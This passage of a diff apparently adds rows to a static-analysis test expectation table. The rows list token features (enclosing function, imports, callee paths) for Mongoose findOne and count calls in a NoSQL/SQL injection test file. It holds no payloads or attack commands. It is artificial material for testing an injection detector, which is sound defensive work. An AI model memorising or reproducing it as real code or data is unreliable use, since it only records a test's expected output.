autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:11:86:17 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:11:86:17 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:11:86:17 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:11:86:17 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:19:86:19 | X | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:19:86:19 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:19:86:19 | X | calleeImports | mongoose | @@ -2558,6 +12989,14 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:19:86:19 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:19:86:19 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:19:86:19 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:21 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:21 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:21 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:21 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | (err, r ... (query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | (err, r ... (query) | calleeImports | mongoose | @@ -2566,6 +13005,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | (err, r ... (query) | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | (err, r ... (query) | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:22:86:51 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:23:86:25 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:28:86:30 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:28:86:30 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:28:86:30 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:28:86:30 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:38 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:38 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:38 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:38 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:44 | err.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:44 | err.count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:44 | err.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:44 | err.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | err.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | exceptional return of err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | exceptional return of err.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | exceptional return of err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:36:86:51 | exceptional return of err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:40:86:44 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:40:86:44 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:40:86:44 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:40:86:44 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:46:86:50 | query | CalleeFlexibleAccessPath | err.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:46:86:50 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:46:86:50 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2573,6 +13052,38 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:46:86:50 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:46:86:50 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:46:86:50 | query | receiverName | err | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:17 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:17 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:17 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:17 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | Document.findOne(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | exceptional return of Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | exceptional return of Document.findOne(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | exceptional return of Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:20 | exceptional return of Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:25 | Documen ... X).exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:25 | Documen ... X).exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:25 | Documen ... X).exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:25 | Documen ... X).exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:2:87:57 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:11:87:17 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:11:87:17 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:11:87:17 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:11:87:17 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:19:87:19 | X | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:19:87:19 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:19:87:19 | X | calleeImports | mongoose | @@ -2581,6 +13092,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:19:87:19 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:19:87:19 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:19:87:19 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:22:87:25 | exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:22:87:25 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:22:87:25 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:22:87:25 | exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:26 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:26 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:26 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:26 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.findOne().exec | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | (err, r ... (query) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | (err, r ... (query) | calleeImports | mongoose | @@ -2588,6 +13111,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | (err, r ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | (err, r ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:27:87:56 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:28:87:30 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:28:87:30 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:28:87:30 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:28:87:30 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:33:87:35 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:43 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:43 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:43 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:43 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:49 | res.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:49 | res.count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:49 | res.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:49 | res.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | exceptional return of res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | exceptional return of res.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | exceptional return of res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | exceptional return of res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | res.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:41:87:56 | res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:45:87:49 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:45:87:49 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:45:87:49 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:45:87:49 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:51:87:55 | query | CalleeFlexibleAccessPath | res.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:51:87:55 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:51:87:55 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2595,6 +13158,38 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:51:87:55 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:51:87:55 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:87:51:87:55 | query | receiverName | res | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:17 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:17 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:17 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:17 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | Document.findOne(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | exceptional return of Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | exceptional return of Document.findOne(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | exceptional return of Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:20 | exceptional return of Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:25 | Documen ... X).exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:25 | Documen ... X).exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:25 | Documen ... X).exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:25 | Documen ... X).exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:2:88:57 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:11:88:17 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:11:88:17 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:11:88:17 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:11:88:17 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:19:88:19 | X | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:19:88:19 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:19:88:19 | X | calleeImports | mongoose | @@ -2603,6 +13198,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:19:88:19 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:19:88:19 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:19:88:19 | X | receiverName | Document | +| 